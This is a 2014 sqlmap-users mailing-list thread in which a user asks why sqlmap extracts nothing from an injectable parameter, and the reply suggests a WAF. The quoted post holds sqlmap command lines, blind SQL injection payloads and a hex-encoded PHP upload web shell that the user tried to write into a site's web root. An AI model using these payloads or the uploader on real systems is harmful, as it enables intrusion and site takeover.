Re: [sqlmap-users] executing query with NONE result
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2014-01-22 20:19:57
|
Hi. Have you considered that it might be behind some WAF? Bye On Jan 22, 2014 6:28 AM, "Alok Kumar" <myp...@gm...> wrote: > Hello members, need your help to solve this mystery, > my manual assessment against a web application revealed possibility of > sqlinjection vulnerability which has been reconfirmed using Netsparker > automated web application assessment tool. > > I then used sqlmap to exploit the sqlinjection flaw to do something > interesting but none of them worked for me, even sqlmap says the parameter > is injectable and infact it actually exploited the issue but unfortunately > with ZERO results. > > I tried almost everything from "--current-db, --dbs, --banner", and > everything found to be executed with result value as NONE. > > I even tried --sql-shell which gave me an sql-shell> prompt, but whatever > query I tried it gave ZERO result without any error, I did tried some > custom query but that didn't worked because of Stacked query limitation. > > I'm positively sure that target parameter is injectable but couldn't make > out why it is not executing and/or giving any response to my query > > Please help me in this, Thanks in advance! > > I have also posted two of the query which I executed for your reference. > > > SQLMap query output > ************************************************************** First query > ************************************************************** > > root@bt:/pentest/database/sqlmap# ./sqlmap.py -u > http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast > --time-sec=10 -t xxix-output > > sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 18:54:00 > > [18:54:00] [INFO] setting file for logging HTTP traffic > [18:54:00] [INFO] resuming back-end DBMS 'mysql' > [18:54:00] [INFO] testing connection to the target URL > [18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: cid > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: cid=1111111 AND 1062=1062 > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: cid=1111111 AND SLEEP(10) > --- > [18:54:00] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Ubuntu > web application technology: Nginx, PHP 5.3.10 > back-end DBMS: MySQL 5.0.11 > [18:54:00] [INFO] fetching current database > [18:54:00] [WARNING] running in a single-thread mode. Please consider > usage of option '--threads' for faster data retrieval > [18:54:00] [INFO] retrieved: > [18:54:01] [INFO] heuristics detected web page charset 'ascii' > > [18:54:01] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please wait.. > [18:54:07] [WARNING] it is very important not to stress the network > adapter's bandwidth during usage of time-based payloads > > [18:54:08] [WARNING] in case of continuous data retrieval problems you are > advised to try a switch '--no-cast' or switch '--hex' > current database: None > [18:54:08] [INFO] fetched data logged to text files under > '/pentest/database/sqlmap/output/www.xxxxxx.com' > > [*] shutting down at 18:54:08 > > > ************************************************************** Second > query ************************************************************** > root@bt:/pentest/database/sqlmap# ./sqlmap.py -u > http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell > sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 18:18:17 > > [18:18:17] [INFO] resuming back-end DBMS 'mysql' > [18:18:17] [INFO] testing connection to the target URL > [18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: cid > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: cid=1111111 AND 1062=1062 > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: cid=1111111 AND SLEEP(10) > --- > [18:18:18] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Ubuntu > web application technology: Nginx, PHP 5.3.10 > back-end DBMS: MySQL 5.0.11 > [18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press > ENTER > sql-shell> user() > [18:18:25] [INFO] fetching SQL query output: 'user()' > [18:18:25] [WARNING] running in a single-thread mode. Please consider > usage of option '--threads' for faster data retrieval > [18:18:25] [INFO] retrieved: > [18:18:25] [INFO] heuristics detected web page charset 'ascii' > > [18:18:26] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please wait.. > [18:18:32] [WARNING] it is very important not to stress the network > adapter's bandwidth during usage of time-based payloads > > [18:18:33] [WARNING] in case of continuous data retrieval problems you are > advised to try a switch '--no-cast' or switch '--hex' > sql-shell> user() --hex > [18:18:59] [INFO] fetching SQL query output: 'user() --hex' > [18:18:59] [INFO] retrieved: > [18:19:00] [INFO] retrieved: > sql-shell> select > 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e > into "/var/www/xxxxxx.com/upload.php"; --hex > [18:19:16] [WARNING] execution of custom SQL queries is only available > when stacked queries are supported > sql-shell> db_name --hex > [18:19:29] [INFO] fetching SQL query output: 'db_name --hex' > [18:19:29] [INFO] retrieved: > [18:19:29] [INFO] retrieved: > sql-shell> x > [18:19:39] [INFO] fetched data logged to text files under > '/pentest/database/sqlmap/output/www.xxxxxx.com' > > [*] shutting down at 18:19:39 > > > > ------------------------------------------------------------------------------ > CenturyLink Cloud: The Leader in Enterprise Cloud Services. > Learn Why More Businesses Are Choosing CenturyLink Cloud For > Critical Workloads, Development Environments & Everything In Between. > Get a Quote or Start a Free Trial Today. > > http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |